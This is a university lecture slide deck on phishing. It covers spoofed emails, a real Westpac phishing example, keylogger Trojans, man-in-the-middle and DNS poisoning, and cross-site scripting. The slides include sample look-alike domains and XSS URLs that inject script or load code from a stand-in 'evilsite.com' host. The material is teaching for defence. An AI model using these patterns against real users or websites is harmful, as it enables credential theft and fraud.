L1 phishing

PhishingPhishing
1Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh

About me
 Currently, Lecturer in this department for
351 days 
 Former Research Intern in M3C Laboratory,
University of Bolton, UK
Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 2

For you
 Email me at rushdecoder@yahoo.com if
you want
 My homepage and course materials are at
http://rushdishams.googlepages.com
 You need to join
http://groups.google.com/group/csebatche
sofrushdi

Phishing
 The number of unique e-mail-based fraud
attacks detected in November 2005 was
16,882, almost double the 8,975 attacks
launched in November 2004, said the report
(Anti-Phishing Working Group)
 Phishing e-mails pretend to come from
legitimate companies, such as banks and e-
commerce sites
 Used by criminals to try and trick Web users
into revealing personal information and
account detailsRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 4

Phishing
 The number of brands targeted increased
by nearly 50 percent over the course of
2005, from 64 percent to 93 percent in
November 2006
 "One big attack will temporarily hurt a
brand, but the increase in e-commerce is
not slowing down,"
(Mark Murtagh, Websense technical director)

Phishing
 Top brands continue to be hijacked, with
phishers using established names to try to lure
people to their sites
 eBay is often spoofed, for obvious reasons
 Google is increasingly being targeted because
of its expansion into different business
application models.
 The big banking names are used too--HSBC,
Citigroup, Lloyds--all the major brands

Phishing
 There's no point in using local names if the
attack is global
 Attacks are becoming increasingly
sophisticated
 Web sites are hosting keylogging malicious
software
 Before, people had to click on a site to
download malicious code.
 If they thought a web site 'phishy,' they could
leave and probably not be harmed.
 Now. with most phishing sites they just have to

Phishing
 Twenty-five percent of those sites now host
keylogging code
 If you visit one you will probably open yourself
to identity theft or fraud

Exploiting the Weakness
 Why is it that Crooks are able to mount an
attack?
 What are the weaknesses that they exploit?
 Richness of functionality
Complex systems can have program bugs
 Increasing interconnectivity
Separate functions of any system are combined
and interconnected via Internet

Exploiting the Weakness
 Expanding market in exploits
Very few people requires as the technical
gadgets are impressive and cheap
 The scale of content based attacks
Everyone uses e-mails and e-mails are
exploitable. Then why not?

Social Engineering Factors
 Phishing attacks rely upon a mix of technical
deceit and social engineering practices.
 In the majority of cases the Phisher must
persuade the victim
 The victim intentionally performs a series of
actions that will provide access to
confidential information

 Communication channels such as email,
web-pages, IRC and instant messaging
services are popular.
 Phisher must impersonate a trusted source
(e.g. the helpdesk of their bank, automated
support response from their favourite
online retailer, etc.) for the victim to
believe.

Phishing Techniques
 Phishing attacks initiated by email are the
most common.
 Using Trojan Network, Phishers can deliver
specially crafted emails to millions of
legitimate “live” email addresses within a
few hours
 Sometimes phishers purchase e-mail
address

Phishing Techniques
 Utilising well known flaws in the common
mail server communication protocol
(SMTP), Phishers are able to create emails
with fake “Mail From:” headers and
impersonate any organisation they choose.
 Any customer replies to the phishing email
will be sent to them.

Phishing Techniques
 Official looking and sounding emails
 Copies of legitimate corporate emails with
minor URL changes
 HTML based email used to obfuscate target
URL information
 Standard virus/worm attachments to emails

Phishing Techniques
 A plethora of anti spam-detection inclusions
 Crafting of “personalised” or unique email
messages
 Fake postings to popular message boards
and mailing lists
 Use of fake “Mail From:” addresses and
open mail relays for disguising the source of
the email

A real-life phishing example

Things to note
 The email was sent in HTML format
 Lower-case L’s have been replaced with
upper-case I’s. This is used to help bypass
many standard anti-spam filters

Things to note
 Within the HTML-based email, the URL link
https://oIb.westpac.com.au/ib/defauIt.asp in fact
points to a escape-encoded version of the following
URL:
http://olb.westpac.com.au.userdll.com:4903/ib/index.
htm

Things to note

Things to note
 The non-standard HTTP port of 4903 can be
attributed to the fact that the Phishers fake
site was hosted on a third-party PC that had
been previously compromised by an
attacker Rushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 22

Things to note
 Recipients that clicked on the link were
then forwarded to the real Westpac
application.
 However a JavaScript popup window
containing a fake login page was presentedRushdi Shams, Lecturer, Dept of CSE, KUET, Bangladesh 23

Things to note
 This fake login window was designed to capture and
store the recipient’s authentication credentials
 JavaScript also submitted the authentication
information to the real Westpac application

Where are they standing now?
 The inclusion of HTML disguised links
 The use of third-party supplied, or fake,
banner advertising graphics to lure
customers
 The use of web-bugs (hidden items within
the page – such as a zero-sized graphic) to
track a potential customer
 The use of pop-up or frameless windows to
disguise the true source of the Phishers
message.

Where are they standing now?
 Embedding malicious content within the
viewable web-page
 installs software of the Phishers choice (e.g.
key-loggers, screen-grabbers, back-doors
and other Trojan horse programs).

Banner Advertising

IRC and IM
 New on the Phishers radar, IRC and Instant
Messaging (IM) forums are likely to become
a popular phishing ground.
 The common usage of Bots (automated
programs that listen and participate in
group discussions) in many of the popular
channels,

Trojan Hosts
 the delivery source is increasingly becoming
home PC’s that have been previously
compromised.
 Trojan horse program has been installed
which allows Phishers (along with
Spammers, Warez Pirates, DDoS Bots, etc.)
to use the PC as a message propagator.
 tracking back a Phishing attack to an
individual initiating criminal is extremely
difficult.

Trojan Hosts
 the installation of Trojan horse software is
on the increase, despite the efforts of large
anti-virus companies.
 operate large networks of Trojan
deployments (networks consisting of
thousands of hosts are not uncommon)
 Phishers must be selective about the
information they wish to record or be faced
with information overload.

Information Specific Trojans
 You have come across a file named
JavaUtil.zip.
 But you forgot that you have “do not show
known file extensions” in your Windows
setting.
 Hmm, then JavaUtil.zip originally maybe a
.exe file whose full name is JavaUtil.zip.exe
 You, unfortunately, click that zip file to
unzip it.
 You are doomed! 

Information Specific Trojans
 Early in 2004, a Phisher created a custom key-logger
Trojan.
 The Trojan key-logger was designed specifically to
capture all key presses within windows with the titles
of various names including:- commbank,
Commonwealth, NetBank, Citibank, Bank of America,
e-gold, e-bullion, e-Bullion, evocash, EVOCash,
EVOcash, intgold, INTGold, paypal, PayPal, bankwest,
Bank West, BankWest, National Internet Banking, cibc,
CIBC, scotiabank and ScotiaBank

Phishing Attack Vectors
 Man-in-the-middle Attacks
 URL Obfuscation Attacks
 Cross-site Scripting Attacks
 Preset Session Attacks

Man in the Middle Attacks
 the attacker situates themselves between
the customer and the real web-based
application, and proxies all communications
between the systems.
 This form of attack is successful for both
HTTP and HTTPS communications.
 The customer connects to the attackers
server as if it was the real site
 The attackers server makes a simultaneous
connection to the real site.

 The attackers server then proxies all
communications between the customer and
the real web-based application server
 In the case of secure HTTPS
communications, an SSL connection is
established between the customer and the
attackers proxy
 while the attackers proxy creates its own
SSL connection between itself and the real
server.

 The attacker must be able to direct the
customer to their proxy server instead of
the real server.
 This may be carried out through a number
of methods:
 Transparent Proxies
 DNS Cache Poisoning
 URL Obfuscation

Transparent Proxies
 Situated on the same network segment or
located on route to the real server
 a transparent proxy service can intercept all
data by forcing all outbound HTTP and
HTTPS traffic through itself.

DNS Cache Poisoning
 be used to disrupt normal traffic routing by
injecting false IP addresses for key domain
names.
 the attacker poisons the DNS cache of a
network firewall so that all traffic destined
for the MyBank IP address now resolves to
the attackers proxy server IP address

URL Obfuscation
 the attacker tricks the customer into connecting to
their proxy server instead of the real server.
 the customer may follow a link to
http://privatebanking.mybank.com.ch
http://mybank.privatebanking.com
http://privatebanking.mybonk.com
http://privatebanking.mybánk.com
http://privatebanking.mybank.hackproof.com
 And the real one is
http://privatebanking.mybank.com

Third party shortened URL

Cross Site Scripting (XSS)
 make use of custom URL or code injection
into a valid web-based application URL
 the result of poor web-application
development processes.

 Full HTML substitution such as:
http://mybank.com/ebanking?URL=http://evilsite.com/phishing/fakepage.htm
 Inline embedding of scripting content, such
as:
http://mybank.com/ebanking?page=1&client=<SCRIPT>evilcode
 Forcing the page to load external scripting
code, such as:
http://mybank.com/ebanking?page=1&response=evilsite.com%21evilcode.js&go=2

Preset Session Attack

Hidden Frame

Graphical Substitution

References
 The Phishing Guide by Next Generation
Security Software Software Limited.

Related Papers
 Technical Trends in Phishing Attacks by
Jason Milletary
 Why Phishing Works by Dhamija et al.

L1 phishing

More Related Content

What's hot

Viewers also liked

Similar to L1 phishing

More from Rushdi Shams

Recently uploaded

L1 phishing